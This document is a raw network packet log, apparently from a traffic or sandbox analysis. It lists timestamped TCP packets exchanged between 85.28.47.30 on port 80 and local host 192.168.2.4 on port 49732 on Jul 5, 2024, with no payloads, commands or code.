                                                                Jul 5, 2024 04:23:16.873600006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873609066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873613119 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873625040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873631001 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873636007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873650074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873676062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873835087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873847008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873857021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873867989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873879910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873879910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873891115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873892069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873904943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873917103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873920918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873929024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873939991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873943090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873950958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.873956919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.873981953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874003887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874027967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874041080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874069929 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874171972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874183893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874196053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874207973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874212027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874219894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874232054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874238968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874243021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874255896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874263048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874279022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874280930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874294996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874300003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874306917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874320030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874320984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874331951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874336004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874351025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874377966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874442101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874453068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874464035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874478102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874485016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874489069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874501944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874505997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874515057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874522924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874526024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874538898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874551058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.874553919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874577045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.874591112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.960146904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960158110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960167885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960186958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960197926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960208893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960221052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960227966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.960232973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.960267067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.960299015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961097956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961107969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961127043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961138964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961144924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961153030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961160898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961169004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961182117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961190939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961194992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961218119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961236000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961272955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961283922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961288929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961299896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961317062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961317062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961347103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961359024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961370945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961380005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961390972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961401939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.961416006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.961446047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962791920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962802887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962814093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962835073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962852955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962862015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962876081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962887049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962898970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962902069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962914944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.962917089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962930918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.962954998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.964399099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964409113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964418888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964443922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.964466095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.964478016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964495897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964507103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964519024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964529991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.964576006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.964603901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.964603901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965027094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965035915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965042114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965048075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965080023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965095043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965101957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965107918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965121984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965133905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965142965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965142965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965153933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.965162039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965171099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.965189934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966011047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966067076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966077089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966088057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966106892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966108084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966120005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966130972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966140985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966144085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966151953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966170073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966173887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966185093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966185093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966196060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966207981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966212034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966219902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966233015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966237068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966257095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966262102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966275930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966278076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966285944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966305971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966327906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966372967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966407061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966417074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966428995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966448069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966450930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966459990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966470957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966473103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966483116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966495991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966496944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966509104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966521978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966533899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966556072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966557980 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966567039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966578960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966602087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966636896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966638088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966648102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966666937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966690063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966727018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966730118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966738939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966749907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966773033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966782093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966785908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966795921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966799974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966821909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966828108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966835976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966847897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966854095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966869116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966875076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966888905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966896057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966901064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966912985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966921091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966926098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966939926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966939926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966953039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966965914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966968060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.966976881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.966993093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967009068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967024088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967035055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967047930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967061043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967071056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967072010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967083931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967093945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967106104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967113018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967116117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967137098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967149019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967175961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967187881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967199087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967211962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967221975 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967222929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967236042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967247009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967252970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967261076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967263937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967278004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967288017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967291117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967312098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967329979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967360973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967372894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967384100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967392921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967401981 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967416048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967442036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967449903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967463017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967472076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967483997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967489004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967498064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967504025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967511892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967535019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967542887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967545033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:16.967554092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:16.967591047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.051131010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051150084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051160097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051171064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051181078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051191092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051201105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051209927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.051213026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051256895 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.051269054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.051970005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.051980019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052016973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052037954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052050114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052059889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052076101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052077055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052092075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052098036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052103043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052119970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052148104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052179098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052190065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052200079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052212954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052227974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052258015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052262068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052267075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052278042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052289963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052299976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.052301884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052320957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.052356958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.053853035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.053970098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.053980112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.053991079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054001093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054011106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054020882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.054023027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054029942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.054035902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054044962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.054053068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.054061890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.054075003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.055402994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055413961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055423021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055438042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055448055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055449963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.055471897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.055480957 CEST4973280192.168.2.485.28.47.30
